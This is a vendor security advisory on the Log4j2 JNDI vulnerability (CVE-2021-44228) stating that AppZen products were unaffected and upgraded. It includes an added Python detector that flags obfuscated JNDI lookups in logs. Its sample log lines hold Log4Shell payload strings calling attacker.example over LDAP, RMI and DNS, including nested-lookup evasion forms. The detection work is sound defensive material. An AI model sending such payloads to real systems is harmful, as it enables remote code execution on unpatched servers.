On 9 December 2021, Apache disclosed a critical zero-day vulnerability in Apache Log4j2 (CVE-2021-44228). We are sharing information about the vulnerability and what AppZen is doing to provide you with appropriate coverage.
What is the Apache Log4j2 JNDI Vulnerability?
From the NIST National Vulnerability Database (CVE-2021-44228):
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”
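The NVD text above describes the mechanism: any attacker-controlled string that reaches a log statement is scanned for `${...}` lookups, and a `${jndi:...}` lookup makes Log4j fetch and load code from the named LDAP, RMI or DNS endpoint. A practitioner's first question is whether such strings have already been sent to their own systems. The following detector is an added example written for this page; it is not code from the advisory or from AppZen. The log lines are constructed for the example, and the handful of lookups it evaluates (`lower`, `upper` and the `${name:-default}` form) are the ones attackers commonly nest to hide the literal word `jndi` from naive string matching.

```python
import re

# Constructed sample access-log lines for this example (not AppZen data).
# The quoted User-Agent field carries the lookup strings an attacker would send.
SAMPLE_LINES = [
    '203.0.113.10 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.11 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.12 "GET / HTTP/1.1" 200 "${${lower:J}ndi:rmi://attacker.example/b}"',
    '203.0.113.13 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '203.0.113.14 "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.68.0"',
]

# An innermost lookup: ${...} whose body contains no further $, { or }.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The signature we actually want, matched against the normalised text;
# the optional group captures the URI scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.IGNORECASE)


def _resolve(match):
    """Evaluate the subset of Log4j lookups attackers nest to hide 'jndi'."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${name:-default}: the variable is never set in a payload, so the
        # default text is what Log4j substitutes (e.g. ${::-j} -> "j").
        return body.split(":-", 1)[1]
    return match.group(0)  # unknown lookup, leave it in place


def normalize(text, max_rounds=16):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        collapsed = _INNERMOST.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookup(line):
    """Return (normalised_line, scheme) if the line carries a JNDI lookup, else None."""
    normalized = normalize(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return normalized, (m.group(1) or "").lower()


def scan(lines):
    """Return one finding per line that contains a (possibly obfuscated) JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hit = find_jndi_lookup(line)
        if hit:
            normalized, scheme = hit
            findings.append({"line": number, "scheme": scheme, "normalized": normalized})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f['line']}: jndi via {f['scheme'] or '?'} -> {f['normalized']}")
```

Normalising before matching is the point of the example: lines 3 and 4 of the sample contain no literal `jndi` yet resolve to exactly the same `${jndi:...}` string as line 2, while the `${env:HOME}` probe on line 5 is left alone because it is not a JNDI lookup. The same approach works on any text field an application logs (headers, usernames, form fields), which is where these payloads were actually delivered.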
What AppZen products are impacted by the vulnerability?
Expense Audit: This vulnerability did not impact AppZen Expense Audit. As a precaution, AppZen will update the vulnerable libraries in the upcoming release.
Autonomous AP: This vulnerability did not impact the Autonomous AP application.
AppZen AppStore: This vulnerability did not impact the Mastermind Analytics application.
Mitigation Applied: Even though the vulnerability did not impact AppZen, applications have been upgraded to Log4j 2.16.0. The update was deployed on 15 December 2021.